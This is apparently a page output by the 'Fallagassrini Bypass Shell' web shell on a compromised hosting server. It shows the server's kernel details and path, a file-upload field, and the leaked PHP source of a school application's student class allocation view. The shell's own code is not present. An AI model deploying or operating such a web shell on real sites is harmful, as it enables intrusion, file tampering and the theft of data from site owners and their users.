? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/eldertree/application/views/student/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/eldertree/application/views/student/single_student_class.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');

$stud    = array(0);
$index      = 0;
?>
<script type="text/javascript">
    
    function getSessionAmount(session,divid){
        var res = session.split("~");
        $('#'+divid).val(res[1]);
    }
    
    function checkallstd(status,tag)        
    { 
        $('#'+tag+ ' input').each(function(index,obj){
            if(obj.type === 'checkbox')
            {
                obj.checked = !status;
            }
        });
    }

</script>
<div class="row-fluid">
    <div class="tab-pane " id="tab_2">
        <div class="portlet box yellow">
            <div class="portlet-title">
                <div class="caption"><i class="icon-reorder"></i>Student Class Allocation</div>
                <div class="tools">
                    <a href="#" onclick="viewdata('student','viewinstudentsearch','search_student_class','view_student_class','<?= $_SESSION['pagenum']; ?>')" class="remove"></a>
                </div>
            </div>
            <div class="portlet-body form">
                <div class="form-horizontal form-view form-bordered">
                    <?php
                    $attributes = array('id'    => 'validateform', 'class' => 'form-horizontal validate');
                    echo form_open('student/addinstudent/update_student_class/view_student_class/1', $attributes);
                    ?>
                    <h3 class="form-section">Class Room Details</h3>
                    <div class="portlet box yellow" >
                        <div class="portlet-title">
                            <div class="caption"><i class="icon-check"></i>Class Room Details</div>
                        </div>
                        <div class="portlet-body">
                            <table  class="table table-striped table-hover table-bordered" > 
                                <tr>
                                    <th>Class Code</th>
                                    <th>Class Room Name</th>
                                </tr>
                                <tr>
                                    <td><?= $viewinfo->class_name_code; ?></td>
                                    <td><?= $viewinfo->class_room_name; ?></td>
                                </tr>                                 
                            </table>
                            <input type="hidden" name="class_name_id"  id="class_name_id" value="<?= $viewinfo->class_name_id; ?>"/>
                        </div>
                    </div>
                    <div class="portlet box yellow" >
                        <div class="portlet-title">
                            <div class="caption"><i class="icon-check"></i>Student In <?= $viewinfo->class_name_code; ?></div>
                        </div>
                        <div class="portlet-body">
                            <table class="table table-striped table-hover table-bordered" cellpadding="0" cellspacing="0" id="tbl1">              
                <tr style="border-bottom: 1px solid #71B4D3;">
                    <th width="10%">Sl No</th>
                    <th width="25%">Student Name</th>
                    <th width="10%">Student Reg No.</th>
                    <th width="10%">Age</th>
                    <th width="10%">Gender</th>
                    <th width="15%">Nationality</th>
                    <th width="10%">No of Days</th>
<!--                    <th>Remove</th>-->

                </tr>                                    
                <tbody id="list_student_added">
                    <?php
                    $html1 = '';
                    $html = '';
                    $index = 1;
                    $i=1;
                    $active = count($class_students) - (count($cancelled_student) + count($deactivate_student));
                    $slno1 = $active + 1;
                    $slno2 = $active + count($cancelled_student) + 1;
                    if (count($class_students)) {
                        $temp = "";
                        foreach ($class_students as $value) {
                            $stud[] = $value['term_id'] . '_' . $value['student_id'];

                            if (in_array($value['student_id'], $cancelled_student)) {
                                $status = 'Cancelled';
                            } elseif (in_array($value['student_id'], $deactivate_student)) {
                                $status = 'Deactivated';
                            } else {
                                $status = 'Active';
                            }
                            ?>
                            <tr id="<?=$i;?>">
                                <td>
                                    <?= $index ?>
                                </td>
                                <td>
                                <a class="search_details" data-student_class_id="<?=$value['student_class_id']?>" id="image_icon" href="#"  >
                                    <?= $value['first_name'] ." ". $value['last_name'] ?></a> 
                                </td>
                                <td>
                                    <?= $value['reg_no']; ?>
                                </td>
                                <td>
                                    <?php
                                    /* 'yyyy-mm-dd format' */
                                    $age_details = $this->mastermodel->getAgeDetails($value['dob']);
                                    echo $age_details['in_words'];
                                    ?>
                                </td>
                                <td>
                                    <?= $value['gender']; ?>
                                </td> 
                                <td>
                                    <?= $this->mastermodel->get_single_field_value('nationality','nationality_name','nationality_id',$value['nationality_id']) ?>
                                </td>
                                <td>
                                    <?= $value['no_of_days'] ?> 
                                </td>
<!--                                <td>
                            <img style="float: right; vertical-align: top;"src="<?= base_url() ?>assets/img/close.png" alt="Delete Row" class="delRow clickimage" onclick="delete_student_class('<?= $value['student_class_id']; ?>','<?=$i;?>')" title="Delete Row"/>
                            </td>-->
                               
                            </tr>
                            <?php
                            $index++;
                            $i++;
                        }
                    } else {
                        ?>
                    <td colspan="7"  style='background-color:#71B4D3;color:white;'>
                        No student is in this class
                    </td>
                    <?php
                }
                ?>
                </tbody>
            </table> 
                            <input type="hidden" name="class_name_id"  id="class_name_id" value="<?= $viewinfo->class_name_id; ?>"/>
                        </div>
                    </div>






                      <input type="hidden" value="<?= implode(',', $stud) ?>" name="list_stud_id" id="list_stud_id" />
    <input id="index" name="index" value="<?= $index ?>" type="hidden"/>    
    <div id="sl"></div>

                    <?php echo form_close(); ?>
                </div>
            </div>
        </div>
    </div>
</div>
<script>
    jQuery(document).ready(function() { 
       
        $('.search_details').on("click",function(e){
            e.preventDefault();
            var $modal = $('<div id="payment_vouchar_div" class="modal hide fade" tabindex="-1"></div>');
            var student_class_id = $(this).data('student_class_id');
            $.ajax({
            url : "<?= site_url('student/edit_student_fee') ?>/" + student_class_id +"/student_class_id/single_student_fee",
            success: function(data){
                $modal.empty().html(data);
                $modal.modal();
            }
            }); 
            
        });
        UIModals.init();
        TableManaged.init();
    });
</script>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net